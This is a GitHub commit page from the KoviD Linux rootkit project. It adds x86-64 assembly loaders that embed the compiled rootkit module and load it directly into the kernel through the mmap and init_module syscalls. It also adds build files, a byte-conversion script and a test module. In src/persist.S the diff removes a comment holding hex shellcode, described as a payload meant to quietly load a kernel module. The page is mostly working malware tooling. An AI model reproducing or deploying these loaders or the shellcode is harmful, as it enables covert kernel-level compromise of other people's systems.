Skip to content

Commit

Permalink
Merge pull request #149 from carloslack/loader
Browse files Browse the repository at this point in the history
Loader
  • Loading branch information
carloslack authored Dec 3, 2024
2 parents 3513ade + c26924b commit 5447299
Show file tree
Hide file tree
Showing 7 changed files with 301 additions and 33 deletions.
17 changes: 17 additions & 0 deletions inject/Makefile
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
# turn off ring buffer debug:
# $ DEPLOY=1 make

LD=$(shell which ld)
AS=$(shell which as)

all:
# kovid as include file
as -o kv_incbin.o kv_incbin.S
ld -o kv_incbin kv_incbin.o
# kovid embedded
as -o kv_embed.o kv_embed.S
ld -o kv_embed kv_embed.o

clean:
@rm -fv *.o kv_incbin kv_embed

13 changes: 13 additions & 0 deletions inject/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
## 1 Build steps

### 1.1 Build KoviD

cd ../ && PROCNAME=kovid make && make strip && cd -

## 2 Build payload

./update.sh && make

## 3 Test

sudo ./kv_embed ; dmesg
19 changes: 19 additions & 0 deletions inject/hello.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
// hello.c
#include <linux/init.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("hash");
MODULE_DESCRIPTION("Hello World");

static int __init hello_init(void) {
printk(KERN_INFO "Hello, world!\n");
return 0;
}

static void __exit hello_exit(void) {
printk(KERN_INFO "Bye!\n");
}

module_init(hello_init);
module_exit(hello_exit);
108 changes: 108 additions & 0 deletions inject/kv_embed.S
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
# BSD 3-Clause License
#
# Copyright (c) 2024, Carlos Carvalho
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# © 2022 GitHub, Inc.
# Terms
# Privacy
# Security


# mmap and load KoviD binary from .inc file

.section .data
empty_str: .asciz "" # pass empty name to init_module so to avoid a warning

.section .text
.globl _start

_start:
# module size
mov $kovid_ko_end-kovid_ko, %r15

add $4095, %r15
and $-4096, %r15

mov $9, %rax # mmap syscall number
xor %rdi, %rdi # addr = NULL (let kernel choose)
mov %r15, %rsi # length = rounded up module size
mov $3, %rdx # prot = PROT_READ | PROT_WRITE 0x3
mov $0x22, %r10 # flags = MAP_PRIVATE | MAP_ANONYMOUS
mov $-1, %r8 # fd = -1 (anonymous mapping)
xor %r9, %r9 # offset 0
syscall

cmp $-1, %rax
je mmap_error

mov %rax, %r12 # mmap addr

lea kovid_ko(%rip), %rsi # src
mov %r12, %rdi # dst
mov $kovid_ko_end-kovid_ko, %rcx # module size
rep movsb

mov $175, %rax # init_module syscall number
mov %r12, %rdi # module data
mov $kovid_ko_end-kovid_ko, %rsi # length of the module
lea empty_str(%rip), %rdx # empty string as modname
syscall

cmp $0, %rax
jne init_error

mov $11, %rax # munmap syscall number
mov %r12, %rdi # address
mov %r15, %rsi # length
syscall

mov $60, %rax # exit
xor %rdi, %rdi # zero status
syscall

mmap_error:
mov $60, %rax # exit
mov $1, %rdi # status 1
syscall

init_error:
mov $11, %rax # munmap syscall number
mov %r12, %rdi # address
mov %r15, %rsi # length
syscall

mov $60, %rax # exit syscall number
mov $1, %rdi # status 1
syscall

.section .data
kovid_ko:
.include "kv_embed.inc"

kovid_ko_end:

109 changes: 109 additions & 0 deletions inject/kv_incbin.S
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
# BSD 3-Clause License
#
# Copyright (c) 2024, Carlos Carvalho
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# © 2022 GitHub, Inc.
# Terms
# Privacy
# Security


# mmap and load KoviD binary from disk

.section .data
empty_str: .asciz "" # pass empty name to init_module so to avoid a warning

.section .text
.globl _start

_start:
mov $kovid_ko_end-kovid_ko, %r15

# round up page
add $4095, %r15
and $-4096, %r15

mov $9, %rax # mmap syscall number
xor %rdi, %rdi # addr = NULL (let kernel choose)
mov %r15, %rsi # length = rounded up module size
mov $3, %rdx # prot = PROT_READ | PROT_WRITE
mov $0x22, %r10 # flags = MAP_PRIVATE | MAP_ANONYMOUS
mov $-1, %r8 # fd = -1 (anonymous mapping)
xor %r9, %r9 # offset = 0
syscall

cmp $-1, %rax # failed?
je mmap_error

# Save the mmap address
mov %rax, %r12 # save mmap addr

lea kovid_ko(%rip), %rsi # source address
mov %r12, %rdi # destination address
mov $kovid_ko_end-kovid_ko, %rcx # size of the module
rep movsb

mov $175, %rax # init_module syscall number
mov %r12, %rdi # module data
mov $kovid_ko_end-kovid_ko, %rsi # length of the module
lea empty_str(%rip), %rdx # empty string as modname
syscall

cmp $0, %rax # if init_module return error
jne init_error

mov $11, %rax # munmap
mov %r12, %rdi # address
mov %r15, %rsi # length
syscall

mov $60, %rax # exit
xor %rdi, %rdi # zero status
syscall

mmap_error:
mov $60, %rax # exit
mov $1, %rdi # status 1
syscall

init_error:

mov $11, %rax # munmap
mov %r12, %rdi # address
mov %r15, %rsi # length
syscall

mov $60, %rax
mov $1, %rdi # exit error
syscall

.section .data
kovid_ko:
.incbin "../kovid.ko"
kovid_ko_end:

2 changes: 2 additions & 0 deletions inject/update.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
#!/bin/bash
xxd -i ../kovid.ko |grep ^" "|while read l ; do echo " .byte $l"|sed 's/,$//' ; done >kv_embed.inc
66 changes: 33 additions & 33 deletions src/persist.S
Original file line number Diff line number Diff line change
@@ -1,36 +1,36 @@
/**
* Linux Kernel version <= 5.8.0
* - hash
*
* KoviD rootkit
*
* This code is designed to serve as the payload for Volundr.
*
* While it can be readily customized to execute other commands,
* its primary purpose is to load a Linux Kernel Module (LKM) quietly.
*
* Make sure to read this! You will need the 'loadmodule.sh' script:
*
* ---snip---
* #!/bin/bash
* /sbin/insmod $1 2>/dev/null
* ---snip---
*
* \x50\x51\x52\x56\x57\x41\x53\xb8\x39\x00\x00\x00\x0f\x05\x83\xf8\x00\x75
* \x31\x48\x8d\x05\xb9\x00\x00\x00\x48\x8d\x3d\xa6\x00\x00\x00\x48\x31\xd2
* \x52\x50\x57\x48\x89\xe6\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x8f\x00
* \x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05\x48\x31\xc0\xb8\x02\x00\x00
* \x00\x48\x8d\x3d\x8f\x00\x00\x00\x48\xc7\xc6\x00\x00\x00\x00\x0f\x05\x48
* \x83\xec\x10\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\x48\xc7\xc2\x11
* \x00\x00\x00\x0f\x05\x48\xc7\xc1\x12\x00\x00\x00\xb0\x2d\x48\x89\xe7\xfc
* \xf2\xae\x49\xc7\xc5\x11\x00\x00\x00\x49\x29\xcd\x4c\x89\xe9\x48\x31\xdb
* \x48\x89\xe6\x48\x89\xf7\xfc\xac\x3c\x39\x7e\x04\x2c\x57\xeb\x02\x2c\x30
* \x48\xc1\xe3\x04\x48\x09\xc3\xaa\xe2\xeb\x48\x83\xc4\x10\x49\xb8\x88\x77
* \x66\x55\x44\x33\x22\x11\x49\x01\xd8\x41\x5b\x5f\x5e\x5a\x59\x58\x41\xff
* \xe0\x2f\x76\x61\x72\x2f\x2e\x6c\x6d\x2e\x73\x68\x2f\x76\x61\x72\x2f\x2e
* \x6b\x76\x2e\x6b\x6f\x2f\x70\x72\x6f\x63\x2f\x73\x65\x6c\x66\x2f\x6d\x61
* \x70\x73
*/
# BSD 3-Clause License
#
# Copyright (c) 2024, Carlos Carvalho
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# © 2022 GitHub, Inc.
# Terms
# Privacy
# Security

.globl _start

Expand Down

0 comments on commit 5447299

Please sign in to comment.